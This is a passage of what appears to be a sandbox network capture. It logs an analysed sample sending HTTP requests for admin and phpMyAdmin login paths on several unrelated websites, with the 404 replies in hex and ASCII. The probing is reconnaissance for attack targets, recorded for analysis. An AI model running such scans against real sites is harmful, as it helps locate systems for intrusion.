                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.377856970 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                98192.168.2.65502281.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.249761105 CET227OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.443481922 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                99192.168.2.65527381.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.273860931 CET233OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.468607903 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                100192.168.2.65533069.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.316293001 CET224OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.474515915 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                101192.168.2.65495481.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.396338940 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.074866056 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.074917078 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.088270903 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.304498911 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.304507017 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                102192.168.2.65495581.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.396620989 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.075208902 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 